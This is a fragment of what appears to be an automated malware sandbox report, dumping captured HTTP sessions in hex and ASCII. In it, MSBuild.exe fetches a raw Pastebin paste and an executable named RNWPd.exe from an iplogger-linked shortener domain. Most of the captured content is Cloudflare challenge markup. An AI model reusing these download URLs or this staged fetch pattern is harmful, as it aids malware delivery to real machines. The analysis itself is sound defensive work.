20
                    Data Ascii: cf-chl-out: vaptzWLivT70JOWDfNhdOk3OIwveti5LpMGFwQMJzm+oDFJv6KimMZizdknUhl8lHDAyhMAZgWI1AZ2nhLhovCNYcvjICPaoWkRaakIV22s=$3/vo9ZeBZMr5cI4ZjTjr7g==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                    2024-09-16 19:23:05 UTC1369INData Raw: 34 30 64 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                    Data Ascii: 40da<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                    2024-09-16 19:23:05 UTC1369INData Raw: 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67
                    Data Ascii: MSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.theme-dark #challenge-error-text{background-image:url(data:image/svg
                    2024-09-16 19:23:05 UTC1369INData Raw: 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d
                    Data Ascii: Igdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuM
                    2024-09-16 19:23:05 UTC1369INData Raw: 2e 33 39 31 70 78 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 67 72 69 64 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68
                    Data Ascii: .391px}.feedback-content{align-content:space-between;display:inline-grid;height:100vh;margin:0;padding:0}.feedback-content .spacer{margin:0}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top:4rem}.h
                    2024-09-16 19:23:05 UTC1369INData Raw: 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c
                    Data Ascii: tLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url
                    2024-09-16 19:23:05 UTC1369INData Raw: 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 20 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28
                    Data Ascii: le}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (
                    2024-09-16 19:23:05 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 34 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 20 61 7b 63
                    Data Ascii: allenge-error-text{background-position:100%;padding-left:0;padding-right:34px}.challenge-content .spacer{margin:2rem 0}.challenge-content .loading-spinner{height:76.391px}@media (prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body a{c
                    2024-09-16 19:23:05 UTC1369INData Raw: 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e
                    Data Ascii: S4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}}</style><meta http-equiv="refresh" conten
                    2024-09-16 19:23:05 UTC1369INData Raw: 56 68 49 45 36 78 75 6a 47 68 42 5a 68 55 50 64 49 6f 56 38 6b 51 61 66 76 6a 41 69 7a 4a 5f 4c 31 44 32 4c 67 42 4d 57 75 55 6b 37 6a 4c 58 55 44 73 4c 66 63 30 50 6d 72 55 6f 49 48 67 5a 62 4f 30 38 31 33 5f 56 54 53 63 4f 52 59 51 59 35 6f 44 71 45 4b 31 49 56 78 35 33 33 4e 33 6a 6b 64 64 42 78 48 46 34 44 75 4b 38 76 34 69 6a 74 68 64 78 6c 4f 5a 36 34 55 77 33 6e 76 6b 33 45 33 6c 59 6a 32 55 5f 77 7a 62 75 5f 33 79 4c 42 53 30 79 65 49 64 4a 48 55 43 6e 6c 5a 65 55 6d 57 68 62 55 59 59 36 58 78 5f 30 63 33 4a 6c 6d 43 32 4f 50 43 71 74 4e 31 31 33 6c 63 6a 77 57 37 74 33 44 66 46 6e 39 6e 4a 37 4d 6f 55 44 6c 49 69 53 67 57 53 47 44 38 57 45 78 50 53 70 6f 48 4a 38 39 76 45 55 67 6a 5f 6e 36 44 2e 53 44 52 68 47 5f 7a 4c 70 64 56 56 33 79 71 71 34
                    Data Ascii: VhIE6xujGhBZhUPdIoV8kQafvjAizJ_L1D2LgBMWuUk7jLXUDsLfc0PmrUoIHgZbO0813_VTScORYQY5oDqEK1IVx533N3jkddBxHF4DuK8v4ijthdxlOZ64Uw3nvk3E3lYj2U_wzbu_3yLBS0yeIdJHUCnlZeUmWhbUYY6Xx_0c3JlmC2OPCqtN113lcjwW7t3DfFn9nJ7MoUDlIiSgWSGD8WExPSpoHJ89vEUgj_n6D.SDRhG_zLpdVV3yqq4


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.649779104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:05 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:23:06 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433aa2de037292-EWR
                    2024-09-16 19:23:06 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:23:06 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:23:06 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:23:06 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:23:06 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.649780188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:06 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:23:06 UTC902INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:23:06 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:23:06 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4CINb68ngpw21o5djcizZ9p1sDyzq2OHSTWEPHRDdkzloBphXJmcLfakxDUfIP%2F7uJ%2F5gqBqirs%2BA97ze36d4MOXaDoF8Tu5PvDe3Ek6mv1I0Dzr%2ByCQk8%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433aa72bf743e9-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:23:06 UTC467INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:23:06 UTC1369INData Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65
                    Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
                    2024-09-16 19:23:06 UTC1369INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61
                    Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
                    2024-09-16 19:23:06 UTC1369INData Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d
                    Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
